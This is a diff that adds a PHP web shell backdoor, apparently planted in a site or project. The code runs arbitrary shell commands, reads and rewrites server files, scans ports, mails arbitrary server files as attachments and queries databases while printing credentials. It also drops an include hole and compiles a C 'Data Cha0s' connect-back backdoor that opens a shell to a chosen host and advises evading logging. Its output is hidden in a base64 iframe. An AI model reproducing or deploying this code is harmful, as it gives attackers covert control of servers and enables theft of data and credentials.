+register_globals: $RG | 
+magic_quotes_gpc: $MQ | 
+syslogging: ";
+if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
+$strOutput .= "
+<br><br>
+</center>
+<font color='#000000'>";
+foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 
+
+###############################################################################
+# test cmd shell environment
+###############################################################################
+if($env == 1) { 
+	$strOutput .= "
+	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
+	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
+	if($emeth==0) { 
+		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
+	} else {
+		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
+		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
+		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
+		</table>";
+	}
+}
+
+###############################################################################
+# test php environment
+###############################################################################
+if($phpenv == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
+		<tr><td colspan=2>posix infos</td><tr>";
+		if(function_exists('posix_uname')) {
+			$posix_uname = posix_uname();
+			while (list($info, $value) = each ($posix_uname)) {
+				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
+			}
+		} else {
+			$strOutput .= "posix_uname not available";
+		}
+		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
+		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
+		else $strOutput .= "posix_getuid not available";
+		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
+		else $strOutput .= "posix_geteuid not available";
+		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
+		else $strOutput .= "posix_getgid not available";
+	$strOutput .= "</table>";
+}
+
+
+###############################################################################
+# dump variables
+###############################################################################
+if($dumpvars == 1) {
+	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
+	<tr><td>" . dd("GLOBALS") . "</td></tr>
+	</table>";
+}
+###############################################################################
+# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($debugscript == 1) { ?>
+	<table border=1><tr><td><h3>debug script</h3></td></tr>
+	<tr><td>
+	<? ddb("DebugArr"); ?>
+	</td></tr>
+	</table>
+<? }
+###############################################################################
+# copy file
+###############################################################################
+if($filecopy == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
+	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
+	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# edit file
+###############################################################################
+if($fileedit == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
+	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
+	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= show_file($editfile);
+	$strOutput .= "</textarea></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= edit_file($editcontent,$editfile,$edit);
+ 	$strOutput .= "</td></tr>
+	</table>
+	</form>";
+}
+###############################################################################
+# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($cmdln == 1) {
+	$emeth = test_cmd_shell();
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
+	<tr><td colspan=2>";
+	if($emeth < 3) {
+		$strOutput .= "The output of this command will be somewhere on the page!";
+		Mexec($cmdcall, $emeth);
+	} else {
+		$strOutput .= Mexec($cmdcall, $emeth);
+	}
+	$strOutput .= "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# sending mime mail
+###############################################################################
+if($mail == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
+	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
+	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
+	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
+	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
+	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
+	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
+	</form>
+	</table>";
+}
+
+###############################################################################
+# drop mini inc handling
+###############################################################################
+if($dropinc == 1) { 
+	if($loc!="") $miniinc_loc = $loc;
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
+	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# connect C back shell handling
+###############################################################################
+if($connectback == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
+	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+###############################################################################
+# PHP shell handling
+###############################################################################
+if($phpshell == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
+	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+
+###############################################################################
+# snooping
+###############################################################################
+if($snoop == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
+	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show highlited source
+###############################################################################
+if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# service check
+###############################################################################
+if($servicecheck == 1) {
+if($servhost!="") $host = $servhost;
+else $host = "localhost";
+
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
+	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
+	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
+	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+
+	$hosts = explode(" ", $host);
+	$port = explode(" ",$tcpports);
+	$values = count($port);
+	$numhosts = count($hosts);
+	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
+	else if($values > 1) $strOutput .= "Checking $values ports..\n";
+	else $strOutput .= "No ports specified!!\n";
+	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
+	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
+	else $strOutput .= "No hosts specified!!\n";
+	if($numhosts >= 1) {
+		for($hcount=0; $hcount < $numhosts; $hcount++) {
+			$tmphost = $hosts[$hcount];
+			$strOutput .= "\nTesting $tmphost..\n";
+			if(($values == 1 && $port[0] != "") | $values > 1) {
+				for ($cont=0; $cont < $values; $cont++) {
+					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
+					$service = getservbyport($port[$cont],"tcp");
+					@$get = fgets($sock[$cont]);
+					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
+					flush();
+				}
+			}
+		}
+	}
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show phpinfo
+###############################################################################
+if($phpinfo == 1){ 
+	phpinfo();
+}
+######################################################################
+# db stuff
+######################################################################
+if($mysqlaccess == 1) {
+	$strOutput .= "<table border=1>
+	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
+	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
+	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
+	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
+	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
+	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
+	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
+	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
+	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
+	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
+	</table>";
+}
+
+if($incdbhost!="" && $incdbuser!="") {
+	if($incdbvar!="") $dbh = $incdbhost;
+	else $dbH = $incdbhost;
+	$dbu = $incdbuser;
+	$dbp = $incdbpass;
+	if($incdbsql!="") $dbs = $incdbsql;
+	if($incdbname!="") $dbn = $incdbname;
+	if($incdbtable!="") $dbt = $incdbtable;
+	if($incdbfile!="") $dumpfile = $incdbfile;
+}
+
+if(isset($dbh)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$dbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td>" .
+		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
+	} else if(isset($dbs)) {
+		$Gdbsql = $dbs;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
+		} else {
+			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
+		}
+	} else if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+		}
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
+		"</td></tr><tr><td>" .
+		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($dbH)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
+		"</td></tr><tr><td>".
+		display_dbs($dbH, $dbu, $dbp);
+	} else if(isset($dbs)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
+		} else {
+			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
+		}
+	} else if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td> ";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
+		}
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
+		"</td></tr><tr><td>" .
+		display_tables($dbH, $dbu, $dbp, $dbn);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($Odbh)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$Odbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
+		"</td></tr><tr><td>" .
+		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($OdbH)) {
+	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
+	if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
+		"</td></tr><tr><td> " .
+		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
+	} else {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
+		"</td></tr><tr><td> " .
+		Odisplay_tables($OdbH, $dbu, $dbp);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+
+$strOutput .= "</font></td></tr></table>";
+$strOutputB64 = chunk_split(base64_encode($strOutput));
+echo "</div></div></div></div></div></div></div></div></div></div>\n";
+echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';
+
+######################################################################
+#
+# functions
+#
+######################################################################
+# make globals avail
+function import_globals()  
+{
+	global $HTTP_SERVER_VARS;
+	global $REMOTE_ADDR;  
+	global $PHP_SELF;
+	global $REQUESTS;
+	global $SCRIPT_FILENAME;
+	global $QUERY_STRING;
+	global $SCRIPT_URI;
+	global $SERVER_NAME;
+	$_igr = ini_get('register_globals');
+	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
+	if (phpversion() <= '4.1.0') {
+		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
+	} else {
+		$REQUESTS = $_REQUEST;
+	}
+	if($_SERVER['PHP_SELF']=="") {
+		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
+		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
+		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
+		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
+		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
+	} else {
+		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
+		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
+		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
+		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
+		$PHP_SELF        = $_SERVER['PHP_SELF'];
+		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
+	}
+}
+
+function dd($v) {
+	global $DebugArr;
+	$rv = "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if(array_search($key, $DebugArr)) {'.
+	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+function ddb($v) {
+	echo "<blockquote>\n";
+	$q="while(list(\$key,\$val) = each(\$$v)) {".
+	' if((is_array($val)) && ($key!="GLOBALS")) {'.
+	'  echo "<b>$key</b>>><br/>";'.
+	'  @dd($v."[".$key."]");'.
+	' } else if($key=="GLOBALS") {'.
+	' } else echo "<b>$key</b>=>$val<br/>";'.
+	'};';
+	eval($q);
+	echo "</blockquote>\n";
+}
+
+######################################################################
+# cmd shell functions
+######################################################################
+# test what cmd is working
+function test_cmd_shell(){
+	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
+	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
+	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
+	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
+	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
+	else $var = 0;
+	return $var;
+}
+# function for executing cmds
+function Mexec($Mcmd, $type) {
+	if($Mcmd != ""){
+		$dspec = array(
+			0 => array("pipe", "r"),
+			1 => array("pipe", "w"),
+			2 => array("pipe", "r")
+		);
+		$output = "";
+		switch($type) {
+			case 5:
+				$output .= "<pre>";
+				$lastline = exec($Mcmd, $arrOutput);
+				foreach($arrOutput as $val) {
+					$output .= $val . "\n";
+				}
+				$output .= "</pre>";
+				break;
+			case 4:
+				$proc = proc_open($Mcmd, $dspec, $pipes);
+				if (is_resource($proc)) {
+					$output .= "<pre>";
+					fclose($pipes[0]);
+					while(!feof($pipes[1])) {
+						$tmp = fgets($pipes[1], 1024);
+						$output .= $tmp;
+					}
+					$output .= "</pre>";
+				}
+				break;
+			case 3;
+				$output .= "<pre>";
+				$output .= `$Mcmd`;
+				$output .= "</pre>";
+				break;
+			case 2;
+				print "<pre>\n";
+				$output = system($Mcmd);
+				print "</pre>\n";
+				break;
+			case 1;
+				print "<pre>\n";
+				$output = passthru($Mcmd);
+				print "</pre>\n";
+				break;
+			case 0;
+			default;
+				$output = "There are no execute functions available!";
+				break;
+		}
+		return $output;
+	}	
+}
+function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
+	$msgerror = "";
+	if($msg == "") $msgerror = "please enter a message";
+	elseif($subject == "") $msgerror = "please enter a subject";
+	else {
+		$stlf = md5(uniqid(time())); 
+		$attach = "";
+		$fp = fopen($attach_source, "rb"); 
+		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
+		$header = "From: $from\n"; 
+		$header .= "MIME-Version: 1.0\n"; 
+		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
+		$header .= "This is a multi-part message in MIME format\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: text/plain\n"; 
+		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
+		$header .= "$msg\n"; 
+		$header .= "--$stlf\n"; 
+		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
+		$header .= "Content-Transfer-Encoding: base64\n"; 
+		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
+		$header .= chunk_split(base64_encode($attach)); 
+		$header .= "\n"; 
+		$header .= "--$stlf--"; 
+		mail($to,$subject,"",$header); 
+		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
+	} 
+	return $msgerror;
+}
+
+######################################################################
+# system browsing
+######################################################################
+
+function make_switch($val){
+	global $txt;
+	global $lang;
+	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
+	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
+	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
+	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
+}
+function drop_syslog_warning($msg) {
+	global $syslog;
+#	if($syslog == 1) syslog(LOG_WARNING,$msg);
+}
+
+######################################################################
+# file functions
+######################################################################
+function copy_file($source,$dest) {
+	$dataout = "";
+	if($source == "")  $dataout .= "enter source<br>\n";
+	if($dest != "") {
+		ini_set("user_agent","m0ins downloader");
+		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
+		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "enter destination";
+	}
+}
+function edit_file($cont,$dest,$do) {
+	$dataout = "";
+	global $magic_quotes_gpc;
+	if(file_exists($dest)) {
+		if($do == 1){
+			$fh = fopen($dest, "w");		
+			if(!$fh) {
+				$dataout .= "unable to open <b>$dest</b>.\n";
+			} else {
+#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
+				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
+				$write = fwrite($fh, $cont);
+				fclose($fh);
+			}
+		}
+		$dataout .= highlight_file($dest, 1);
+	} else {
+		$dataout .= "unable to open <b>$dest</b>.\n";
+	}
+	return $dataout;
+}
+function show_file($source) {
+	$dataout = "";
+	if(file_exists($source)) {
+		$fh = fopen($source, "r");
+		if(!$fh) {
+			$dataout .= "unable to open <b>$source</b>.\n";
+		} else {
+			$read = fread($fh, filesize($source));
+			fclose($fh);
+			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
+			$dataout .= $read;
+		}
+	} else {
+		$dataout .= "unable to open <b>$source</b>.\n";
+	}
+	return $dataout;
+}
+function snoopy($chdir){
+	$tmpOut = "";
+	global $is_file,$is_dir,$is_w_dir,$is_w_file;
+	$fh = opendir("$chdir");
+	if($fh!="") {
+		while (false !== ($filename = readdir($fh)) ) {
+			$FN = $chdir."/".$filename;
+			if(@is_file($FN)) $is_file[] = $filename;
+			if(@is_dir($FN))  $is_dir[] = $filename;
+			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
+			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
+		}
+		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
+		$tmpOut .= echo_files($is_file,  "all files");
+		$tmpOut .= echo_files($is_dir,   "only dirs");
+		$tmpOut .= echo_files($is_w_dir, "writable dirs");
+		$tmpOut .= echo_files($is_w_file,"writable files");
+		$tmpOut .= "</tr></table>";
+	} else {
+		$tmpOut .= "Permission denied.";
+	}
+	closedir($fh);
+	return $tmpOut;
+}
+
+function echo_files($arr,$txt){
+	$tmpOutMF = "";
+	global $chdir,$MyLoc,$SREQ;
+	$tmpOutMF .= "<td valign=top>";
+	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
+	if(count($arr) > 0) {
+		foreach($arr as $key => $file) {
+			$FN = $chdir."/".$file;
+			$owner = fileowner($FN);
+			$perms = substr(sprintf("%o",fileperms($FN)),-3);
+			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
+			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
+			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
+		}
+	}
+    $tmpOutMF .=  "</td>";
+    return $tmpOutMF;
+}
+function print_globals($v) {
+	global $a;
+	echo "<blockquote>\n";
+	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
+	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
+	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
+	" @print_globals( \$v.\"[\".\$key.\"]\" );".
+	"}}";
+	eval($q);
+	echo "</blockquote>\n";
+}
+######################################################################
+# connect back shell function
+######################################################################
+
+function connect_back($tmp_dir, $compiler, $host, $port) {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
